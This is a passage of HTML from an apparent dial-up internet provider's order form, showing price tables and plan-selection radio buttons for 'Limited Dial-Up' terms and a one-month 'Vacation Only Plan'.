class="compare_head_Order4"><strong>12&nbsp;Months</strong></td> </tr> <tr> <td class="compareOrder4">Monthly&nbsp;Cost</td> <td class="compare_head_Order5"><strong>$6.95 p/month</strong></td> <td class="compare_head_Order5"><strong>$6.95 p/month</strong></td> <td class="compare_head_Order5"><strong>$6.95 p/month</strong></td> </tr> <tr> <td class="compareOrder4">Term Total</td> <td class="compare_head_Order5">$20.85 + $10 Setup Fee</td> <td class="compare_head_Order5">$41.70</td> <td class="compare_head_Order5">$83.40</td> </tr> <tr> <td class="compareOrder2">Select Plan</td> <td class="compare_head_Order2"> <input type="radio" name="TERM" value="PLAN: Limited Dial-Up - Every 3 Months ($20.85 ($6.95/mo) & $10 SETUP FEE)" /></td> <td class="compare_head_Order2"> <input type="radio" name="TERM" value="PLAN: Limited Dial-Up - Every 6 Months ($41.70 ($6.95/mo) & NO SETUP FEE)" /></td> <td class="compare_head_Order2"> <input type="radio" name="TERM" value="PLAN: Limited Dial-Up - Every 12 Months ($83.40 ($6.95/mo) & NO SETUP FEE)" /></td> </tr> </table> <table><tr><td><p>&nbsp;</p></td></tr></table> <div class="header_body_order"> <h1>Vacation Only Plan - One Month Only</h1>Setup Up Payment Schedule </div> <table border="0" width="575" cellpadding="0" cellspacing="0"> <tr> <td class="compareOrder">&nbsp;&nbsp;Term&nbsp;&nbsp;</td> <td class="compare_head_Order4"><strong>1&nbsp;Month</strong></td> </tr> <tr> <td class="compareOrder4">Monthly&nbsp;Cost</td> <td class="compare_head_Order5"><strong>$9.95 One Month Only + $10 Setup Fee</strong></td> </tr> <tr> <td class="compareOrder2">Select Plan</td> <td class="compare_head_Order2"> <input type="radio&..